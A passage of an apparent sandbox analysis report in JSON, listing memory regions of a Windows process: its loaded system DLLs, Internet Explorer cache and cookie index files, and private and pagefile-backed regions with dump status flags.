"ref_process_dump": null, "size": 245760, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2539519, "entry_point": 2293760, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1455", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 2293760, "timestamp": "00:00:49.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2539519, "entry_point": 2298509, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1456", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 2293760, "timestamp": "00:00:49.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1957888000, "type": "region", "version": 1 }, "end_va": 1958129663, "entry_point": 1957892749, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1460", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1957888000, "timestamp": "00:00:49.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_1461", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:50.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1212415, "entry_point": 0, "filename": null, "id": "region_1462", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:00:50.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1146879, "entry_point": 0, "filename": null, "id": "region_1463", "name": "pagefile_0x0000000000110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1114112, "timestamp": "00:00:50.790", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1122303, "entry_point": 0, "filename": null, "id": "region_1521", "name": "pagefile_0x0000000000110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1114112, "timestamp": "00:00:50.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1949237248, "type": "region", "version": 1 }, "end_va": 1950932991, "entry_point": 1949427381, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1522", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1949237248, "timestamp": "00:00:50.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 1179648, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1523", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:00:50.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1253375, "entry_point": 0, "filename": null, "id": "region_1524", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:50.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1228799, "entry_point": 1179648, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1525", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:00:50.947", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2326527, "entry_point": 2293760, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1526", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 2293760, "timestamp": "00:00:50.949", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 2359296, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1527", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 2359296, "timestamp": "00:00:50.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1957691392, "type": "region", "version": 1 }, "end_va": 1957826559, "entry_point": 1957696606, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_1528", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1957691392, "timestamp": "00:00:50.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1991311360, "type": "region", "version": 1 }, "end_va": 1991593983, "entry_point": 1991315937, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_1529", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1991311360, "timestamp": "00:00:50.965", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1971912704, "type": "region", "version": 1 }, "end_va": 1972129791, "entry_point": 1971912704, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_1530", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1971912704, "timestamp": "00:00:50.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1998848000, "type": "region", "version": 1 }, "end_va": 1998872575, "entry_point": 1998848000, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_1531", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1998848000, "timestamp": "00:00:50.986", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38404096, "type": "region", "version": 1 }, "end_va": 39452671, "entry_point": 0, "filename": null, "id": "region_1532", "name": "private_0x00000000024a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38404096, "timestamp": "00:00:50.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1954217984, "type": "region", "version": 1 }, "end_va": 1954496511, "entry_point": 1954217984, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_1533", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1954217984, "timestamp": "00:00:51.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2293760, "start_va": 43057152, "type": "region", "version": 1 }, "end_va": 45350911, "entry_point": 0, "filename": null, "id": "region_1534", "name": "private_0x0000000002910000", "norm_filename": null, "region_type": "private_memory", "start_va": 43057152, "timestamp": "00:00:51.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1954086912, "type": "region", "version": 1 }, "end_va": 1954201599, "entry_point": 1954086912, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_1535", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1954086912, "timestamp": "00:00:51.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1955332096, "type": "region", "version": 1 }, "end_va": 1955360767, "entry_point": 1955332096, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_1536", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1955332096, "timestamp": "00:00:51.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1991245824, "type": "region", "version": 1 }, "end_va": 1991258111, "entry_point": 1991245824, "filename": "\\Windows\\SysWOW64\\normaliz.dll", "id": "region_1537", "name": "normaliz.dll", "norm_filename": "c:\\windows\\syswow64\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 1991245824, "timestamp": "00:00:51.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1952251904, "type": "region", "version": 1 }, "end_va": 1952587775, "entry_point": 1952251904, "filename": "\\Windows\\SysWOW64\\rasapi32.dll", "id": "region_1538", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\syswow64\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1952251904, "timestamp": "00:00:51.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1952120832, "type": "region", "version": 1 }, "end_va": 1952206847, "entry_point": 1952120832, "filename": "\\Windows\\SysWOW64\\rasman.dll", "id": "region_1539", "name": "rasman.dll", "norm_filename": "c:\\windows\\syswow64\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1952120832, "timestamp": "00:00:51.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1952055296, "type": "region", "version": 1 }, "end_va": 1952108543, "entry_point": 1952055296, "filename": "\\Windows\\SysWOW64\\rtutils.dll", "id": "region_1540", "name": "rtutils.dll", "norm_filename": "c:\\windows\\syswow64\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1952055296, "timestamp": "00:00:51.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1541", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:00:51.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11010048, "type": "region", "version": 1 }, "end_va": 11272191, "entry_point": 0, "filename": null, "id": "region_1542", "name": "private_0x0000000000a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 11010048, "timestamp": "00:00:51.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43188224, "type": "region", "version": 1 }, "end_va": 44236799, "entry_point": 0, "filename": null, "id": "region_1543", "name": "private_0x0000000002930000", "norm_filename": null, "region_type": "private_memory", "start_va": 43188224, "timestamp": "00:00:51.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45088768, "type": "region", "version": 1 }, "end_va": 45350911, "entry_point": 0, "filename": null, "id": "region_1544", "name": "private_0x0000000002b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 45088768, "timestamp": "00:00:51.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_1545", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:00:51.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_1546", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2424832, "timestamp": "00:00:51.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41418751, "entry_point": 0, "filename": null, "id": "region_1547", "name": "private_0x0000000002740000", "norm_filename": null, "region_type": "private_memory", "start_va": 41156608, "timestamp": "00:00:51.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 45350912, "type": "region", "version": 1 }, "end_va": 46399487, "entry_point": 0, "filename": null, "id": "region_1548", "name": "private_0x0000000002b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 45350912, "timestamp": "00:00:51.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1951989760, "type": "region", "version": 1 }, "end_va": 1952014335, "entry_point": 1951989760, "filename": "\\Windows\\SysWOW64\\SensApi.dll", "id": "region_1549", "name": "sensapi.dll", "norm_filename": "c:\\windows\\syswow64\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1951989760, "timestamp": "00:00:51.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_1550", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:00:51.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1951924224, "type": "region", "version": 1 }, "end_va": 1951989759, "entry_point": 1951924224, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_1551", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1951924224, "timestamp": "00:00:51.139", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 38404096, "type": "region", "version": 1 }, "end_va": 38928383, "entry_point": 0, "filename": null, "id": "region_1552", "name": "private_0x00000000024a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38404096, "timestamp": "00:00:51.150", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39190528, "type": "region", "version": 1 }, "end_va": 39452671, "entry_point": 0, "filename": null, "id": "region_1553", "name": "private_0x0000000002560000", "norm_filename": null, "region_type": "private_memory", "start_va": 39190528, "timestamp": "00:00:51.150", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1554", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:00:51.150", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 851968, "start_va": 44236800, "type": "region", "version": 1 }, "end_va": 45088767, "entry_point": 0, "filename": null, "id": "region_1555", "name": "private_0x0000000002a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 44236800, "timestamp": "00:00:51.151", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1951858688, "type": "region", "version": 1 }, "end_va": 1951883263, "entry_point": 1951858688, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_1556", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1951858688, "timestamp": "00:00:51.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38404096, "type": "region", "version": 1 }, "end_va": 38666239, "entry_point": 0, "filename": null, "id": "region_1557", "name": "private_0x00000000024a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38404096, "timestamp": "00:00:51.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 38862848, "type": "region", "version": 1 }, "end_va": 38928383, "entry_point": 0, "filename": null, "id": "region_1558", "name": "private_0x0000000002510000", "norm_filename": null, "region_type": "private_memory", "start_va": 38862848, "timestamp": "00:00:51.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 46923776, "type": "region", "version": 1 }, "end_va": 47972351, "entry_point": 0, "filename": null, "id": "region_1559", "name": "private_0x0000000002cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46923776, "timestamp": "00:00:51.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1951793152, "type": "region", "version": 1 }, "end_va": 1951858687, "entry_point": 1951793152, "filename": "\\Windows\\SysWOW64\\NapiNSP.dll", "id": "region_1560", "name": "napinsp.dll", "norm_filename": "c:\\windows\\syswow64\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1951793152, "timestamp": "00:00:51.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_1561", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:00:51.179", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1951662080, "type": "region", "version": 1 }, "end_va": 1951735807, "entry_point": 1951662080, "filename": "\\Windows\\SysWOW64\\pnrpnsp.dll", "id": "region_1562", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\syswow64\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1951662080, "timestamp": "00:00:51.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1951399936, "type": "region", "version": 1 }, "end_va": 1951645695, "entry_point": 1951399936, "filename": "\\Windows\\SysWOW64\\mswsock.dll", "id": "region_1563", "name": "mswsock.dll", "norm_filename": "c:\\windows\\syswow64\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1951399936, "timestamp": "00:00:51.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1951334400, "type": "region", "version": 1 }, "end_va": 1951367167, "entry_point": 1951334400, "filename": "\\Windows\\SysWOW64\\winrnr.dll", "id": "region_1564", "name": "winrnr.dll", "norm_filename": "c:\\windows\\syswow64\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1951334400, "timestamp": "00:00:51.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1951268864, "type": "region", "version": 1 }, "end_va": 1951289343, "entry_point": 1951268864, "filename": "\\Windows\\SysWOW64\\WSHTCPIP.DLL", "id": "region_1565", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\syswow64\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1951268864, "timestamp": "00:00:51.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1951203328, "type": "region", "version": 1 }, "end_va": 1951227903, "entry_point": 1951203328, "filename": "\\Windows\\SysWOW64\\wship6.dll", "id": "region_1566", "name": "wship6.dll", "norm_filename": "c:\\windows\\syswow64\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1951203328, "timestamp": "00:00:51.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1949204479, "entry_point": 1948975104, "filename": "\\Windows\\SysWOW64\\FWPUCLNT.DLL", "id": "region_1567", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\syswow64\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:00:51.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3608575, "entry_point": 0, "filename": null, "id": "region_1568", "name": "pagefile_0x0000000000370000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3604480, "timestamp": "00:00:51.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 49938432, "type": "region", "version": 1 }, "end_va": 50200575, "entry_point": 0, "filename": null, "id": "region_1569", "name": "private_0x0000000002fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49938432, "timestamp": "00:00:51.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1969553408, "type": "region", "version": 1 }, "end_va": 1970089983, "entry_point": 1969562578, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_1570", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1969553408, "timestamp": "00:00:51.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3674111, "entry_point": 0, "filename": null, "id": "region_1571", "name": "pagefile_0x0000000000380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3670016, "timestamp": "00:00:51.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 368640, "start_va": 1948581888, "type": "region", "version": 1 }, "end_va": 1948950527, "entry_point": 1948581888, "filename": "\\Windows\\SysWOW64\\netprofm.dll", "id": "region_1572", "name": "netprofm.dll", "norm_filename": "c:\\windows\\syswow64\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 1948581888, "timestamp": "00:00:51.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1948516352, "type": "region", "version": 1 }, "end_va": 1948573695, "entry_point": 1948516352, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_1573", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1948516352, "timestamp": "00:00:51.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 44236800, "type": "region", "version": 1 }, "end_va": 44498943, "entry_point": 0, "filename": null, "id": "region_1574", "name": 